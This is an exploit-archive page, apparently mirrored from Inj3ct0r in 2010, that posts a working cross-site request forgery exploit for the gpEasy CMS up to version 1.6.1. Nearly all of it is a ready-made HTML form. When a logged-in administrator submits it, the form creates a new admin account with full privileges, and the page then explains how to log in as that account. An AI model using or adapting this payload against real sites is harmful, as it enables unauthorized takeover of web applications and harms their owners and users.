Home / os / win7

gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit

Posted on 29 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>gpEasy &lt;= 1.6.1 CSRF Remote Add Admin Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================= gpEasy &lt;= 1.6.1 CSRF Remote Add Admin Exploit ============================================= Author : Giuseppe 'giudinvx' D'Inverno Email : &lt;giudinvx[at]gmail[dot]com&gt; Date : 04-29-2010 Site : http://www.giudinvx.altervista.org/ Location : Naples, Italy -------------------------------------------------------- Application Info Site : http://www.gpeasy.com/ Version: 1.6.1 -------------------------------------------------------- ==============[[ -Exploit Code- ]]============== &lt;html&gt; &lt;form method=&quot;post&quot; action=&quot;[patth]/index.php/Admin_Users&quot;&gt; &lt;input type=&quot;text&quot; value=&quot;xxx&quot; name=&quot;username&quot;&gt;&lt;br/&gt; &lt;input type=&quot;password&quot; value=&quot;xxx&quot; name=&quot;password&quot;&gt;&lt;br/&gt; &lt;input type=&quot;password&quot; value=&quot;xxx&quot; name=&quot;password1&quot;&gt;&lt;br/&gt; &lt;input type=&quot;text&quot; value=&quot;xxx&quot; name=&quot;email&quot;&gt;&lt;br/&gt; &lt;input value=&quot;Admin_Menu&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Uploaded&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Extra&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Theme&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Users&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Configuration&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Trash&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Uninstall&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Addons&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_New&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input value=&quot;Admin_Theme_Content&quot; type=&quot;hidden&quot; name=&quot;grant[]&quot;&gt; &lt;input type=&quot;hidden&quot; value=&quot;newuser&quot; name=&quot;cmd&quot;&gt; &lt;input type=&quot;submit&quot; value=&quot;Continue&quot; name=&quot;aaa&quot; class=&quot;submit&quot;&gt; &lt;/form&gt; &lt;/html&gt; # Now you have an Admin user with name: xxx and password: xxx, just login page [path]/index.php/Admin # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-29]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP